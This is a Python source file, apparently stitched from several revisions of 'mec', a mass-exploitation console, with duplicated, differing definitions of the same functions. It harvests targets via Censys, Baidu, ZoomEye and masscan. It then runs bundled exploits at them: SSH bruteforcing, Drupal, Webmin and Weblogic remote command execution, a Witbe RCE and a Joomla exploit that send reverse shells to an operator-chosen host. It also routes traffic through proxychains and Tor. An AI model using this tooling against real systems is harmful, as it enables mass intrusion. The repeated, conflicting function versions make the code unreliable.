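def run_info(**kwargs):
    """
    Print the mec status banner: working paths, target list and proxy state.

    Keyword Args:
        session: the active session object. When it is absent an error line
            is printed and the function returns without touching anything.
    """
    session = kwargs.get("session", None)
    if session is None:
        # Without this guard the attribute lookups below raise AttributeError.
        colors.colored_print("[-] info: session not exist", colors.RED)
        return

    # proxy_status is only ever promoted to "OK" here; when the proxy is not
    # usable the value the session already carried is printed unchanged.
    if session.shadowsocks.is_usable():
        session.proxy_status = "OK"

    # Banner text is kept exactly as it appears on this page; its original
    # line breaks are not recoverable from here.
    # NOTE(review): ss_url presumably embeds the proxy credential - confirm
    # before this output is pasted into tickets or shared logs.
    colors.colored_print(
        f''' session ------- [*] Current directory: {os.getcwd()} [*] Root directory: {session.init_dir} [*] Log file: {session.logfile} [*] Target: {session.ip_list} PROXY ----- [*] Shadowsocks config: {session.shadowsocks.ss_url} [*] Shadowsocks local port: {session.shadowsocks.local_port} [*] Shadowsocks connectivity: {session.proxy_status} ''',
        colors.CYAN)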
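def start_install():
    '''
    Install mec under ~/.mec and optionally store search-API credentials.

    Steps, in order: copy the working tree to ~/.mec, create the virtualenv
    at ~/.mec/.venv when it is not there yet, pip-install the dependencies,
    remove the copied launcher and installer, prompt for ZoomEye and Censys
    credentials, and install the `mec` launcher into /usr/local/bin via sudo.
    Exits with status 1 when the virtualenv cannot be created.
    '''

    def write_private(path, text):
        # The credentials are stored in clear text, so the file is created
        # owner-only (0600) and tightened if it already existed; the handle
        # is closed deterministically instead of being left to the GC.
        handle = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(handle, "w") as conf:
            os.chmod(path, 0o600)
            conf.write(text)

    # virtualenv
    os.system('mkdir ~/.mec')
    os.system('cp -R ./* ~/.mec')
    # os.path does not expand "~": without expanduser() the test looks for a
    # literal "~" directory and the virtualenv is rebuilt on every run.
    if not os.path.isdir(os.path.expanduser("~/.mec/.venv")):
        if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0:
            colors.colored_print("Error setting up virtualenv", colors.RED)
            sys.exit(1)

    # The shell expands "~" here because pip_install builds a shell command.
    venv_py = "~/.mec/.venv/bin/python3"

    # NOTE(review): every package below is installed unpinned from the
    # package index; pinning versions (and hashes) would make the install
    # reproducible and limit exposure to a compromised release.
    # for user interface and autocompletion
    pip_install(venv_py, 'readline')
    # for HTTP jobs
    pip_install(venv_py, 'requests')
    # psutil for killing procs by name
    pip_install(venv_py, 'psutil')
    # tqdm for progress bar
    pip_install(venv_py, 'tqdm')
    # install beatifulsoup4 if not already installed
    pip_install(venv_py, 'bs4')
    # install HTML5lib if not already installed
    pip_install(venv_py, 'html5lib')
    # install docopt if not already installed
    pip_install(venv_py, 'docopt')

    print(colors.BLUE + "Done installing dependencies, now copying files." +
          colors.END)

    # clean temp files.
    os.system('rm -rf ~/.mec/mec')
    os.system('rm -rf ~/.mec/install.py')

    # zoomeye account:
    zoomeye = str(input('Would you like to use zoomeye? (yes/No) ')).lower()
    if zoomeye in ('yes', 'y'):
        # NOTE(review): on this page the two prompts and the two write calls
        # of this branch were damaged by credential scrubbing; they are
        # reconstructed by analogy with the censys branch - confirm against
        # the upstream file.
        user = str(input('Username: '))
        password = str(getpass.getpass('Password: '))
        write_private(MECROOT + '/conf/zoomeye.conf',
                      "user:" + user + "\n" + "password:" + password + "\n")

    censys = str(input('Would you like to use censys? (yes/No) ')).lower()
    if censys in ('yes', 'y'):
        uid = str(input('API ID: '))
        sec = str(getpass.getpass('Secret: '))
        key = {"uid": uid, "sec": sec}
        write_private(MECROOT + '/conf/censys.conf', json.dumps(key))

    if not os.path.isfile("/usr/local/bin/mec"):
        # add mec to $PATH
        os.system('sudo cp mec /usr/local/bin/')
        # fix permissions
        os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py')

    print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" +
          colors.END)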
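def run_search(query, pages):
    """
    Run a Censys host search and append the results to a file under data/.

    Args:
        query: the search string; it also names the output file.
        pages: number of result pages to request (anything int() accepts).

    Returns:
        The relative path of the output file, or "" when query_account()
        returns an empty string.
    """
    censys_search = CensysSearch()

    # check account
    account_info = censys_search.query_account()
    if account_info == "":
        return ""
    colors.colored_print(account_info, colors.BLUE)

    hosts = []
    i = 0
    # NOTE(review): as written this requests pages 1 .. pages+1, one more
    # than asked for - confirm whether the extra page is intended.
    while i <= int(pages):
        i += 1
        sys.stdout.write(
            f"{colors.BLUE}[+] Crawling page {i}...{colors.END}\r")
        # Flush after the write so the progress line is visible immediately.
        sys.stdout.flush()
        # multi thread causes temp ban.
        hosts.extend(censys_search.search_hosts(query, i))
    print()

    # The query becomes part of a file name: quote characters, ':' and '!'
    # and both path separators are replaced so it cannot name a path outside
    # data/.
    out_name = query + ".txt"
    for special_ch in ['"', "'", ':', '!', '\\', '/']:
        out_name = out_name.replace(special_ch, '-')
    file = 'data/censys_' + out_name

    print(str(len(hosts)) + " Host found.")
    # The file is opened in append mode, so end the batch with a newline;
    # otherwise the last host of this run and the first host of the next run
    # end up glued together on one line. The context manager also makes sure
    # the data is flushed before the path is handed back.
    with open(file, "a") as out:
        if hosts:
            out.write("\n".join(str(x) for x in hosts) + "\n")
    return file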
def run_info(**kwargs):
    """
    Show the mec status banner after refreshing the session from its config.

    Keyword Args:
        session: the active session; an error is printed and the function
            returns when it is missing.
    """
    session = kwargs.get("session", None)
    if session is None:
        console.print_error("[-] info: session not exist")
        return

    # update via user config file
    session.read_config()

    # Only the positive result is recorded; otherwise the existing value of
    # proxy_status is what gets printed.
    if session.shadowsocks.is_usable():
        session.proxy_status = "OK"

    # The fragments are joined with single spaces, which reproduces the
    # banner text exactly as it appears on this page (leading and trailing
    # space included); its original line breaks are not recoverable here.
    fragments = [
        "",
        "session",
        "-------",
        f"[*] Auto-Update: {session.auto_update}",
        f"[*] Current directory: {os.getcwd()}",
        f"[*] Root directory: {session.init_dir}",
        f"[*] Log file: {session.logfile}",
        f"[*] Target: {session.ip_list}",
        "proxy",
        "-----",
        f"[*] Shadowsocks config: {session.shadowsocks.ss_url}",
        f"[*] Shadowsocks local port: {session.shadowsocks.local_port}",
        f"[*] Shadowsocks connectivity: {session.proxy_status}",
        "",
    ]
    colors.colored_print(" ".join(fragments), colors.CYAN)
def ssh_bruteforcer(session):
    '''
    Collect the inputs of the built-in SSH password-list module.

    Prompts for a password list (restricted to the *.txt files found under
    MECROOT/data) and for a command string, then hands both to core.Scanner.

    Returns:
        The core.Scanner instance, or None when the chosen list is not a file.
    '''
    colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE)

    # Only files already present under the data directory are offered.
    candidates = glob.glob(core.MECROOT+"/data/*.txt")
    password_list = console.input_check(
        "[*] Password list file to use (put them under ./data): ",
        allow_blank=False,
        choices=candidates)
    if not os.path.isfile(password_list):
        console.print_error("[-] Password list not found")
        return None

    # command to exec
    command = console.input_check("[*] Command to exec: ", allow_blank=False)

    # start scanner: work path, script name, script arguments, job count
    return core.Scanner(
        '/ssh-bruteforce/',
        'ssh_bruteforce.py',
        ["-p", password_list, "-c", command],
        100,
        session)
def main():
    '''
    Run the interactive console loop.

    Sets the default target list, records the process id in the session's
    pid file, then reads and dispatches commands until the user quits.
    '''
    colors.colored_print("[*] Default target list is ./data/ip_list.txt",
                         colors.CYAN)
    SESSION.ip_list = SESSION.init_dir + '/data/ip_list.txt'
    futil.write_file(text=str(os.getpid()), filepath=SESSION.pidfile)

    while True:
        try:
            # Commands may change directory; every prompt starts from MECROOT.
            if os.getcwd() != core.MECROOT:
                os.chdir(core.MECROOT)

            input_cmd = rlinit.prompt(session=SESSION)

            try:
                cmd.cmd_handler(SESSION, input_cmd)
            except (KeyboardInterrupt, EOFError, SystemExit):
                # An interrupt while a command is running ends the program.
                sys.exit(0)

        except FileNotFoundError:
            console.print_error(f"[-] {core.MECROOT} not found???")
            sys.exit(1)
        except KeyboardInterrupt:
            # An interrupt at the prompt asks for confirmation first; a "no"
            # simply falls through to the next loop iteration.
            if console.yes_no("\n[?] Are you sure to exit?"):
                futil.check_kill_process('ss-proxy')
                sys.exit(0)
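def run_check_proxy_pool(**kwargs):
    """
    Check Tor and proxy-chain connectivity in a worker process and print it.

    Keyword Args:
        session: the active session; an error is printed and the function
            returns when it is missing.

    The connectivity probes only run when session.proxy_pool_api is set;
    otherwise a warning is printed and the summary shows the current values.
    """
    session = kwargs.get("session", None)
    if session is None:
        # The original tested this only inside the worker, after
        # session.read_config() had already been called on the object.
        console.print_error("[-] info: session not exist")
        return

    # update via user config file
    session.read_config()

    # check tor
    tor_status = "Unknown"

    def check_tor():
        # also check tor: one request through the local SOCKS port; any
        # failure at all counts as "not connected".
        try:
            requests.get("http://ifconfig.me", timeout=10,
                         proxies=dict(http='socks5://127.0.0.1:9050',
                                      https='socks5://127.0.0.1:9050'))
        except BaseException:
            return False
        return True

    def run_check(res):
        # Runs in the child process; results travel back through `res`.
        res['tor_status'] = "OK" if check_tor() else "DISCONNECTED"

        # check proxy chain
        res['proxy_status'] = "OK" if session.test_proxy() else "DISCONNECTED"

    if session.proxy_pool_api == '':
        console.print_warning("[!] proxy_pool_api not configured")
    else:
        res = Manager().dict()
        proc = Process(target=run_check, args=(res,))
        proc.start()
        console.print_status(
            "[*] please wait while checking proxy chain connectivity...",
            proc
        )
        proc.join()

        # If the worker died before storing a key, fall back to a defined
        # value instead of raising KeyError.
        tor_status = res.get('tor_status', tor_status)
        session.proxy_status = res.get('proxy_status', "DISCONNECTED")

    # Banner text is kept exactly as it appears on this page; its original
    # line breaks are not recoverable from here.
    colors.colored_print(f""" proxy ----- [*] proxy_pool API: {session.proxy_pool_api} [*] tor connectivity: {tor_status} [*] proxy chain connectivity: {session.proxy_status} """, colors.CYAN)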
def pkg_install(pkg_mgr, pkg):
    '''
    Install `pkg` with the system package manager command `pkg_mgr`.

    Runs "<pkg_mgr> <pkg> -y" through the shell and prints a red warning
    when the command exits non-zero. Returns None either way.
    '''
    # Both arguments are interpolated into a shell command unquoted, so they
    # must be trusted, fixed strings chosen by the installer itself.
    status = os.system(f"{pkg_mgr} {pkg} -y")
    if status == 0:
        return

    colors.colored_print(
        f"Could not install {pkg}, some pypi packages might fail to install",
        colors.RED)
def run_init(**kwargs):
    """
    Change the working directory back to the session's init directory.

    Keyword Args:
        session: the active session; its init_dir is the destination.
    """
    active = kwargs.get("session")
    colors.colored_print('[*] Going back to init_dir...', colors.BLUE)
    # init_dir is read after the message, as in the original.
    destination = active.init_dir
    os.chdir(destination)
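def start_install():
    '''
    Install mec under ~/.mec and optionally store search-API credentials.

    Steps, in order: copy the working tree to ~/.mec, create the virtualenv
    at ~/.mec/.venv when it is not there yet, pip-install requirements.txt,
    remove the copied launcher and installer, prompt for ZoomEye and Censys
    credentials, and install the `mec` launcher into /usr/local/bin via sudo.
    Exits with status 1 when the virtualenv cannot be created.
    '''

    def write_private(path, text):
        # The credentials are stored in clear text, so the file is created
        # owner-only (0600) and tightened if it already existed; the handle
        # is closed deterministically instead of being left to the GC.
        handle = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(handle, "w") as conf:
            os.chmod(path, 0o600)
            conf.write(text)

    # virtualenv
    os.system('mkdir ~/.mec')
    os.system('cp -R ./* ~/.mec')
    # os.path does not expand "~": without expanduser() the test looks for a
    # literal "~" directory and the virtualenv is rebuilt on every run.
    if not os.path.isdir(os.path.expanduser("~/.mec/.venv")):
        if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0:
            colors.colored_print("Error setting up virtualenv", colors.RED)
            sys.exit(1)

    # The shell expands "~" here because pip_install builds a shell command.
    venv_py = "~/.mec/.venv/bin/python3"

    # use requirements.txt
    # NOTE(review): whether requirements.txt pins versions cannot be seen
    # from here; pinned versions (and hashes) keep the install reproducible.
    pip_install(venv_py, '-r requirements.txt')

    print(colors.BLUE + "Done installing dependencies, now copying files." +
          colors.END)

    # clean temp files.
    os.system('rm -rf ~/.mec/mec')
    os.system('rm -rf ~/.mec/install.py')

    # zoomeye account:
    zoomeye = str(input('Would you like to use zoomeye? (yes/No) ')).lower()
    if zoomeye in ('yes', 'y'):
        # NOTE(review): on this page the two prompts and the two write calls
        # of this branch were damaged by credential scrubbing; they are
        # reconstructed by analogy with the censys branch - confirm against
        # the upstream file.
        user = str(input('Username: '))
        password = str(getpass.getpass('Password: '))
        write_private(MECROOT + '/conf/zoomeye.conf',
                      "user:" + user + "\n" + "password:" + password + "\n")

    censys = str(input('Would you like to use censys? (yes/No) ')).lower()
    if censys in ('yes', 'y'):
        uid = str(input('API ID: '))
        sec = str(getpass.getpass('Secret: '))
        key = {"uid": uid, "sec": sec}
        write_private(MECROOT + '/conf/censys.conf', json.dumps(key))

    if not os.path.isfile("/usr/local/bin/mec"):
        # add mec to $PATH
        os.system('sudo cp mec /usr/local/bin/')
        # fix permissions
        os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py')

    print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" +
          colors.END)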
def run_exploits(**kwargs):
    """
    List the modules returned by futil.list_exp().

    Keyword Args:
        do_print: when True (the default) the list is printed and None is
            returned; when False the list itself is returned unprinted.
    """
    do_print = kwargs.get("do_print", True)
    exp_list = futil.list_exp()

    if do_print:
        colors.colored_print('[+] Available exploits: ', colors.CYAN)
        for entry in exp_list:
            colors.colored_print(entry, colors.BLUE)
        return None

    # pass this list to readline completer
    return exp_list
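def run_target(**kwargs):
    """
    Point the session at another target list inside <init_dir>/data.

    Keyword Args:
        session: the active session; its ip_list is updated on success.
        args: command arguments; the first one is the file name.
    """
    session = kwargs.get("session")

    # A bare command (no argument, or no args at all) used to fail with
    # IndexError / TypeError; report it instead.
    args = kwargs.get("args") or []
    if not args:
        console.print_error("[-] What target?")
        return
    target = args[0]

    # Membership in the directory listing acts as an allow-list: only plain
    # names that exist directly under data/ pass, so a value containing path
    # separators cannot select a file elsewhere.
    if target not in os.listdir(session.init_dir + '/data'):
        console.print_error("[-] Target file not found")
        return

    colors.colored_print('[i] Target changed to {}'.format(target),
                         colors.BLUE)
    session.ip_list = session.init_dir + \
        '/data/' + target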
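def run_censys(**kwargs):
    """
    Run the Censys crawler and optionally adopt its output as the target list.

    Keyword Args:
        session: the active session; its ip_list is updated when the user
            accepts the collected results.

    No exception leaves this function: an interrupt is reported as a
    warning, any other failure as an error.
    """
    session = kwargs.get("session", None)

    try:
        output = censys.start()
        if console.yes_no("\n[?] Use collected URLs as target?"):
            session.ip_list = session.init_dir + "/" + output
            colors.colored_print(
                '[i] Target changed to {}'.format(
                    session.ip_list), colors.BLUE)
    except (EOFError, KeyboardInterrupt, SystemExit):
        console.print_warning("[-] Interrupted")
        return
    except Exception as exc:
        # The original swallowed every failure silently, which hid missing
        # credentials, network errors and a missing session alike.
        console.print_error(f"[-] Error: {exc}")
        return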
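def run_info(**kwargs):
    """
    Print the mec status banner after refreshing the session from its config.

    Keyword Args:
        session: the active session object. When it is absent an error line
            is printed and the function returns.
    """
    session = kwargs.get("session", None)
    if session is None:
        # Without this guard read_config() below raises AttributeError.
        colors.colored_print("[-] info: session not exist", colors.RED)
        return

    # update via user config file
    session.read_config()

    # Banner text is kept exactly as it appears on this page; its original
    # line breaks are not recoverable from here.
    colors.colored_print(f''' session ------- [*] Auto-Update: {session.auto_update} [*] Current directory: {os.getcwd()} [*] Root directory: {session.init_dir} [*] Log file: {session.logfile} [*] Target: {session.ip_list} ''', colors.CYAN)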
def run_target(**kwargs):
    """
    Point the session at another target list inside <init_dir>/data.

    Keyword Args:
        session: the active session; its ip_list is updated on success.
        args: command arguments; the first one is the file name.
    """
    session = kwargs.get("session")

    try:
        target = kwargs.get("args")[0]
    except IndexError:
        console.print_error("[-] What target?")
        return

    # Only names that appear in the listing of data/ are accepted, which
    # keeps the selection inside that directory.
    data_dir = session.init_dir + '/data'
    if target in os.listdir(data_dir):
        colors.colored_print(
            '[i] Target list changed to {}'.format(target), colors.BLUE)
        session.ip_list = session.init_dir + \
            '/data/' + target
        return

    console.print_error(f"[-] Target list file '{target}' not found")
def drupal_cve20196340(session):
    '''
    Collect the input of the bundled Drupal CVE-2019-6340 module.

    Prompts for one non-blank command string and returns a core.Scanner
    built with the module's work path, script name, that argument, 50 jobs
    and 0.1 as the fifth positional argument.
    '''
    colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE)

    # shell server config
    user_cmd = console.input_check('[?] Command to execute on the target: ',
                                   allow_blank=False)

    # exploit config + start scanner
    return core.Scanner(
        '/drupal/',
        'cve-2019-6340_cmd.py',
        ["-c", user_cmd],
        50,
        0.1,
        session)
def webmin_cve_2019_15107(session):
    '''
    Collect the input of the bundled Webmin CVE-2019-15107 module.

    Prompts for one non-blank command string and returns a core.Scanner
    built with the module's work path, script name, that argument and
    50 jobs.
    '''
    colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE)

    # shell server config
    user_cmd = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    # exploit config + start scanner
    return core.Scanner(
        '/webmin/',
        'webmin.py',
        ["-c", user_cmd],
        50,
        session)
def witbe(session):
    '''
    Collect the inputs of the bundled Witbe module.

    Prompts for an address (validated with ip_check) and a port (validated
    with check_type=int) and returns a core.Scanner built with the module's
    work path, script name, those two arguments and 50 jobs.
    '''
    colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE)

    # shell server config
    listen_host = console.input_check('[?] IP of your shell server: ',
                                      ip_check=True)
    listen_port = console.input_check('[?] and Port? ', check_type=int)

    # exploit config + start scanner
    return core.Scanner(
        '/witbe/',
        'witbe.py',
        ["-l", listen_host, "-p", listen_port],
        50,
        session)
def weblogic_cve201710271(session):
    '''
    Collect the input of the bundled Weblogic CVE-2017-10271 module.

    Prompts for one non-blank command string and returns a core.Scanner
    built with the module's work path, script name, that argument and
    50 jobs.
    '''
    colors.colored_print(
        '\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)

    # shell server config
    user_cmd = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    # exploit config + start scanner
    return core.Scanner(
        '/weblogic/',
        'weblogic_cve-2017-10271.py',
        ["-c", user_cmd],
        50,
        session)
def run_exploits(**kwargs):
    """
    List the modules returned by futil.list_exp().

    Keyword Args:
        do_print: when True (the default) the list is printed and None is
            returned; when False the list itself is returned unprinted.
        session: forwarded to run_info() when the list is empty and the user
            asks to see the status.
    """
    do_print = kwargs.get("do_print", True)
    exp_list = futil.list_exp()
    found = len(exp_list)

    if found == 0:
        # An empty list usually means the paths are off, so offer `info`.
        console.print_error("[-] No exploits found")
        if console.yes_no("[?] Perhaps you need to check `info`?"):
            run_info(session=kwargs.get("session"))

    if do_print:
        colors.colored_print(f"[+] {found} available exploits: ",
                             colors.CYAN)
        for entry in exp_list:
            colors.colored_print(entry, colors.BLUE)
        return None

    return exp_list
def run_baidu(**kwargs):
    """
    Run the Baidu crawler and optionally adopt its result file as target list.

    Keyword Args:
        session: the active session; the crawl runs inside session.out_dir.
        args: [dork, count] - the search string and a value int() accepts.

    An interrupt is reported as a warning; any other failure (including
    missing or malformed args) is printed as an error with debug details.
    """
    session = kwargs.get("session")
    command = kwargs.get("args")

    try:
        dork, count = command[0], int(command[1])

        os.chdir(session.out_dir)
        colors.colored_print('[*] Searching on Baidu...', colors.PURPLE)
        baidu.spider(dork, count)

        wants_targets = console.yes_no("\n[?] Use collected URLs as target?")
        if wants_targets:
            session.ip_list = session.out_dir + "/result.txt"
    except (EOFError, KeyboardInterrupt, SystemExit):
        console.print_warning("[-] Interrupted")
        return
    except BaseException as exc:
        console.print_error(f"[-] Error: {exc}")
        console.debug_except()
def weblogic_cve201710271(session):
    '''
    Collect the inputs of the bundled Weblogic CVE-2017-10271 module.

    Prompts for one non-blank command string and for the operating system
    choice ("linux" or "win"), and returns a core.Scanner built with the
    module's work path, script name, those arguments, 50 jobs and 0.1 as
    the fifth positional argument.
    '''
    colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271',
                         colors.BLUE)

    # shell server config
    user_cmd = console.input_check('[?] Command to execute on the target: ',
                                   allow_blank=False)
    # NOTE(review): the prompt promises a linux default; whether a blank
    # answer is turned into "linux" depends on input_check - confirm.
    os_choice = console.input_check(
        "[?] Target OS, default to linux [linux/win]: ",
        choices=["linux", "win"])

    # exploit config + start scanner
    return core.Scanner(
        '/weblogic/',
        'weblogic_cve-2017-10271.py',
        ["-c", user_cmd, "-os", os_choice],
        50,
        0.1,
        session)
def execute(cmd):
    '''
    Dispatch one line of console input.

    The input is converted to str, lower-cased and stripped, then matched
    against the built-in commands below; anything that matches none of them
    is handed to the system shell.
    '''
    # lol i don't want any errors here
    # Lower-casing applies to the whole line, arguments included.
    cmd = str(cmd).lower().strip()
    if cmd == '':
        return
    elif cmd == 'info':
        # The page shows this literal on one line; the backslash
        # continuations are restored here without indentation - confirm
        # against the upstream layout.
        colored_print(
            '[*] Current directory: {}\
\n[*] Init directory: {}\
\n[*] Log file: {}\
\n[*] Target: {}\
\n[*] Proxy config: {}'.format(
                os.getcwd(), SESSION.init_dir, SESSION.logfile,
                SESSION.ip_list, SESSION.proxy_conf), colors.CYAN)
    elif cmd.startswith('target'):
        # Everything after the command word is joined without spaces.
        target = ''.join(cmd.split()[1:])
        # Only names listed directly under <init_dir>/data are accepted; an
        # unknown name returns without any message.
        if target not in os.listdir(SESSION.init_dir + '/data'):
            return
        colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
        SESSION.ip_list = SESSION.init_dir + \
            '/data/' + target
    elif cmd == 'init' or cmd == 'i':
        colored_print('[*] Going back to init_dir...', colors.BLUE)
        os.chdir(SESSION.init_dir)
    elif cmd.startswith('baidu'):
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SESSION.out_dir)
            colored_print('[*] Searching on Baidu...', colors.PURPLE)
            baidu.spider(dork, count)
        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            # Missing arguments and interrupts both end the command quietly.
            return
    elif cmd == 'proxy':
        # NOTE(review): a missing config is reported, but the proxy binary
        # is still started afterwards - there is no early return.
        if not os.path.exists(SESSION.ss_config):
            console.print_error(
                '[-] Please make sure {} exists'.format(SESSION.ss_config))
        try:
            # Argument list with shell=False: nothing here is parsed by a
            # shell. Both pipes are created but not read in this function.
            subprocess.Popen(
                [SESSION.proxy_bin, '-c', SESSION.ss_config],
                stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)
        except BaseException as err:
            console.print_error(
                '[-] Error starting Shadowsocks proxy: ' + str(err))
            debug_except()
    elif cmd == 'redis':
        console.print_error('[-] Under development')
    elif cmd.startswith('google'):
        try:
            # From here on `cmd` is a list of words, not the input string.
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            # Every argument except the dork is a fixed literal.
            subprocess.call(['./exploits/joomla/joomlaCVE-2015-8562.py',
                             '--dork', dork,
                             '--revshell=\'127.0.0.1\'', '--port=4444'])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()
    elif cmd == 'q' or cmd == 'quit':
        check_kill_process('ss-proxy')
        sys.exit(0)
    elif cmd == 'h' or cmd == 'help' or cmd == '?':
        print(console.HELP_INFO)
    elif cmd == 'exploits':
        colored_print('[+] Available exploits: ', colors.CYAN)
        for poc in list_exp():
            colored_print(poc, colors.BLUE)
    elif cmd == 'z' or cmd == "zoomeye":
        try:
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        else:
            # NOTE(review): as written, debug_except() runs on the success
            # path (no exception raised) - confirm that this is intended.
            debug_except()
    elif cmd == 'x' or cmd == 'clear':
        os.system("clear")
    elif cmd == 'c' or cmd == 'reset':
        os.system("reset")
    elif cmd == "attack" or cmd == "e":
        attack()
    else:
        try:
            print(
                colors.BLUE +
                colors.BOLD +
                "[*] Exec: " +
                colors.END +
                colors.GREEN +
                cmd +
                colors.END + '\n')
            # Unrecognised input goes to the system shell verbatim. That is
            # only acceptable because the text comes from the local operator;
            # this function must never be fed input from another source.
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
def mod_exists(modulename):
    '''
    check if a module exists without importing it

    Returns True when util.find_spec() yields a spec for `modulename` and
    False when it returns None. `util` is presumably importlib.util -
    confirm against the file's imports.
    '''
    mod_spec = util.find_spec(modulename)
    return mod_spec is not None


# distro check and initial packages
# DIST keeps this default unless one of the lookups below replaces it.
DIST = "debian"

try:
    import distro
except ModuleNotFoundError:
    # NOTE(review): loading this file runs an unpinned `pip install` from
    # the package index as a side effect. Declaring `distro` as a normal,
    # pinned dependency would avoid fetching code at import time.
    if os.system("python3 -m pip install distro --user") != 0:
        colors.colored_print("Please install pip first !!!", colors.RED)
        sys.exit(1)
    # Import only if the freshly installed module can actually be found.
    if mod_exists("distro"):
        import distro
except ImportError:
    colors.colored_print("Please use python 3.6+ !!!", colors.RED)
    sys.exit(1)

try:
    DIST = distro.linux_distribution(full_distribution_name=False)[0]
except NameError:
    # Reached when `distro` was never bound above.
    # platform.linux_distribution() was removed in Python 3.8, so on newer
    # interpreters this fallback raises AttributeError.
    import platform
    # pylint: disable=deprecated-method
    DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
def attack():
    '''
    Interactive front end of the `attack` command.

    Asks whether proxychains should be used, then either runs one of the
    numbered built-in modules or collects the path, job count and arguments
    of a module chosen from list_exp(), and hands the result to scanner().
    '''
    SESSION.use_proxy = input_check(
        '[?] Do you wish to use proxychains? [y/n] ',
        choices=['y', 'n']) == 'y'
    if SESSION.use_proxy:
        # Stop early when the proxychains4 binary is not on PATH.
        if shutil.which("proxychains4") is None:
            console.print_error("proxychains4 not found")
            return
        execute("proxy")
    # The page shows this literal on one line; the backslash continuations
    # are restored here without indentation - confirm against the upstream
    # layout.
    answ = input_check(
        '\n[?] Do you wish to use\
\n\n [a] built-in exploits\
\n [m] or launch your own manually?\
\n\n[=] Your choice: ',
        choices=['a', 'm'])
    if answ == 'a':
        print(
            colors.CYAN +
            colors.BOLD +
            '\n[?] Choose a module from: ' +
            colors.END +
            '\n')
        print(console.BUILT_IN)
        # The choices are strings and the branches below compare against
        # strings as well.
        answ = input_check(
            '[=] Your choice: ',
            check_type=int,
            choices=['0', '1', '2', '3', '4'])
        try:
            if answ == '0':
                scanner(exploit_exec.ssh_bruteforcer())
            elif answ == '1':
                scanner(exploit_exec.weblogic())
            elif answ == '2':
                console.print_error("[-] Not available")
            elif answ == '3':
                console.print_error("[-] Not available")
            elif answ == '4':
                scanner(exploit_exec.s2_045())
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
    elif answ == 'm':
        print(
            colors.CYAN +
            colors.UNDERLINE +
            colors.BOLD +
            "\nWelcome, in here you can choose your own exploit\n" +
            colors.END)
        colored_print('[*] Here are available exploits:\n', colors.CYAN)
        for poc in list_exp():
            colored_print(poc + colors.END, colors.BLUE)
        # The path must be one of the entries returned by list_exp().
        exploit = input_check(
            "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
            choices=list_exp())
        jobs = int(
            input_check("[?] How many processes each time? ", check_type=int))
        custom_args = []
        answ = input_check("[?] Do you need a reverse shell [y/n]? ",
                           choices=['y', 'n'])
        if answ == 'y':
            lhost = input_check("[*] Where do you want me to send shells? ",
                                allow_blank=False, ip_check=True)
            lport = input_check("[*] and at what port?", check_type=int)
            custom_args = ['-l', lhost, '-p', lport]
        else:
            pass
        # Extra arguments are split on whitespace; quoting is not honoured.
        custom_args += input_check(
            "[*] args for this exploit: ").strip().split()
        # parse user's exploit name
        # exec_path drops the first path component, work_path drops the last.
        exec_path = exploit.split('/')[1:]
        work_path = exploit.split('/')[:-1]
        exec_path = '/'.join(exec_path)
        work_path = '/'.join(work_path)
        # let user check if there's anything wrong
        # NOTE(review): the preview always shows the proxychains4 prefix,
        # whatever SESSION.use_proxy is; ' '.join() also requires every item
        # of custom_args to be a str - confirm what input_check returns for
        # check_type=int.
        print(
            colors.BLUE +
            '[*] Your exploit will be executed like\n' +
            colors.END,
            'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
                exec_path),
            ' '.join(custom_args))
        # args as parameter for scanner
        scanner_args = console.ScannerArgs(work_path, exec_path,
                                           custom_args, jobs)
        # start scanner
        scanner(scanner_args)
    else:
        console.print_error('[-] Invalid input')
def execute(cmd):
    '''
    Dispatch one line of console input.

    The input is converted to str, lower-cased and stripped, then matched
    against the built-in commands below; anything that matches none of them
    is handed to the system shell.
    '''
    # lol i don't want any errors here
    # Lower-casing applies to the whole line, arguments included.
    cmd = str(cmd).lower().strip()
    if cmd == '':
        return
    if cmd == "masscan":
        # check root, as masscan requires root privilege
        if os.geteuid() != 0:
            console.print_error(
                "[-] Please run mec as root in order to run masscan")
            return
        ports = console.input_check(
            "[?] What ports do you want to scan (eg. 80 443)? ").split()
        try:
            scan.masscan(ports)
        except KeyboardInterrupt:
            console.print_warning("[-] masscan exited")
    elif cmd == 'info':
        # The page shows this literal on one line; the backslash
        # continuations are restored here without indentation - confirm
        # against the upstream layout.
        colored_print(
            '[*] Current directory: {}\
\n[*] Init directory: {}\
\n[*] Log file: {}\
\n[*] Target: {}\
\n[*] Proxy config: {}'.format(os.getcwd(), SESSION.init_dir,
                                SESSION.logfile, SESSION.ip_list,
                                SESSION.proxy_conf), colors.CYAN)
    elif cmd.startswith('target'):
        # Everything after the command word is joined without spaces.
        target = ''.join(cmd.split()[1:])
        # Only names listed directly under <init_dir>/data are accepted.
        if target not in os.listdir(SESSION.init_dir + '/data'):
            console.print_error("[-] Target file not found")
            return
